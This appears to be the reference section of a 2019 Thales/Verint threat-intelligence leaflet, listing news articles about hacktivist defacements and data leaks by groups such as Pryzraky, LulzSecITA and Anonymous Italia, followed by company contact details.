03/04/2019, Rogue Media Labs, Rogue Security Labs Crashed by PopTart of Pryzraky, https://roguemedialabs.com/2019/04/03/rogue-security-labs-crashed-by-poptart-of-pryzraky/
10/04/2019, Rogue Media Labs, NASA's Chandra X-Ray Observatory UAE's Sharaj Exports Development Center & Mackenzie Presbyterian Institute of Brasil Hacked by Al1ne3737 of Pryzraky, https://roguemedialabs.com/2019/04/10/nasas-chandra-x-ray-observatory-uaes-sharaj-exports-development-center-mackenzie-presbyterian-institute-of-brasil-hacked-by-al1ne3737-of-pryzraky/
18/04/2019, Rogue Media Labs, Pryzraky Hackers Responsible for 39 International Hacks Leaks & DDoS Attacks Over The Last 4 Days, https://roguemedialabs.com/2019/04/18/pryzraky-hackers-responsible-for-39-international-hacks-leaks-ddos-attacks-over-the-last-4-days/
14/05/2019, Poder360, Hackers invadem sites do PSB e do MDB; colocaram foto de Bolsonaro e Temer [Hackers break into the PSB and MDB websites; they put up a photo of Bolsonaro and Temer], https://www.poder360.com.br/congresso/hackers-invadem-sites-do-psb-e-do-mdb-colocaram-foto-de-bolsonaro-e-temer/



22/05/2019, O Globo Brasil, Site do PSOL Rio e hackeado e foto de Bolsonaro e colocada no lugar do conteudo [PSOL Rio website hacked and a photo of Bolsonaro put in place of its content], https://oglobo.globo.com/brasil/site-do-psol-rio-hackeado-foto-de-bolsonaro-colocada-no-lugar-do-conteudo-23685874
19/06/2019, TecMundo, Partido Socialista Brasileiro e hackeado por grupo que atacou PSOL [Brazilian Socialist Party hacked by the group that attacked PSOL], https://www.tecmundo.com.br/seguranca/142825-partido-socialista-brasileiro-hackeado-grupo-atacou-psol.htm

ATK143
https://twitter.com/LulzSec_ITA
https://www.facebook.com/lulzsecitalia
http://lulzsec-news.blogspot.com
Attacks timeline: https://www.edoardolimone.com/calendario-attacchi/
07/07/2011, Roma Today, Attacco hacker: Frati tranquillizza studenti e professori [Hacker attack: Frati reassures students and professors], https://nomentano.romatoday.it/san-lorenzo/attacco-hacker-rettore-frati-la-sapienza.html
22/02/2018, ADNkronos, Anonymous attacca Salvini: online 70mila mail [Anonymous attacks Salvini: 70,000 emails online], https://www.adnkronos.com/fatti/politica/2018/02/22/anonymous-attacca-salvini-online-mila-mail_vTaL8s86sduCGDCAaJQWTK.html
09/03/2018, AGI, Precisazione della precisazione. Il doppio salto mortale del Miur sull'attacco hacker [Clarification of the clarification: the Miur's double somersault over the hacker attack], https://www.agi.it/blog-italia/cybersecurity/attacco_hacker_miur_replica-3608917/post/2018-03-09/
15/03/2018, Edoardo Limone, Intervista a LulzSecITA su OpPaperStormITA di Anonymous [Interview with LulzSecITA on Anonymous's OpPaperStormITA], https://www.edoardolimone.com/blog/2018/03/15/intervista-a-lulzsec-su-oppaperstorm-di-anonymous/
15/03/2018, Startup Italia, Anonymous torna alle origini e invita all'azione contro corruzione e povertà [Anonymous goes back to its roots and calls for action against corruption and poverty], https://cybersecurity.startupitalia.eu/60736-20180315-anonymous-contro-corruzione-poverta
16/09/2018, La Repubblica, Anonymous torna a colpire: dopo i sindacati hackerati ora i dati di militari in congedo [Anonymous strikes again: after the hacked trade unions, now the data of discharged soldiers], https://www.repubblica.it/tecnologia/sicurezza/2018/09/16/news/anonymous_italia_torna_a_colpire_dopo_scuola_e_sindacato_hackerati_i_dati_dei_militari_in_congedo-206626543/
05/11/2018, Edoardo Limone, Fine della settimana nera: tiriamo un bilancio degli attacchi [End of the black week: taking stock of the attacks], https://www.edoardolimone.com/blog/2018/11/05/fine-della-settimana-nera-tiriamo-un-bilancio-degli-attacchi/
05/11/2018, La Repubblica, Nuovo attacco di Anonymous Italia: diffusi i dati di ministeri e polizia [New Anonymous Italia attack: ministry and police data released], https://www.repubblica.it/tecnologia/sicurezza/2018/11/05/news/nuovo_attacco_di_anonymous_italia_diffusi_i_dati_di_ministeri_e_polizia-210845817/
11/12/2018, Edoardo Limone, Cyber Attacchi in Italia: un calendario e tante riflessioni [Cyber attacks in Italy: a calendar and many reflections], https://www.edoardolimone.com/blog/2018/12/11/cyber-attacchi-in-italia-un-calendario-e-tante-riflessioni/
13/01/2019, La Repubblica, Morti sul lavoro, la protesta di Anonymous: hackerati i siti delle agenzie per il lavoro [Deaths at work, Anonymous's protest: employment agency websites hacked], https://www.repubblica.it/cronaca/2019/01/13/news/morti_sul_lavoro_la_protesta_di_anonymous_hackerati_i_siti_delle_agenzie_per_il_lavoro-216468315/
08/03/2019, AGI, Gli hacker hanno 'bucato' la Motorizzazione di Roma [Hackers have 'breached' the Rome Motor Vehicle Office], https://www.repubblica.it/cronaca/2019/01/13/news/morti_sul_lavoro_la_protesta_di_anonymous_hackerati_i_siti_delle_agenzie_per_il_lavoro-216468315/ [sic: URL as printed, identical to the previous entry]
22/06/2019, AGI, Il collettivo hacker LulzSec colpisce ancora [The LulzSec hacker collective strikes again], https://www.agi.it/cronaca/hacker_lulzsec_attacco-5705454/news/2019-06-22/
07/09/2019, Cybersecurity, Online oltre 37.000 dati attribuiti a Inas Cisl [Over 37,000 records attributed to Inas Cisl online], https://www.cybersecurity.it/online-oltre-37-000-dati-attribuiti-a-inas-cisl/

Notes _



VERINT Systems Ltd
Maskit 33, Herzelya
https://cis.verint.com

Tour Carpe Diem
31 place des Corolles
92098 Paris La Défense
thalesgroup.com

www.tpcommunication.com - © Thales - 10-2019 - This leaflet cannot be considered as a contractual specification - Photos credits: © Thales
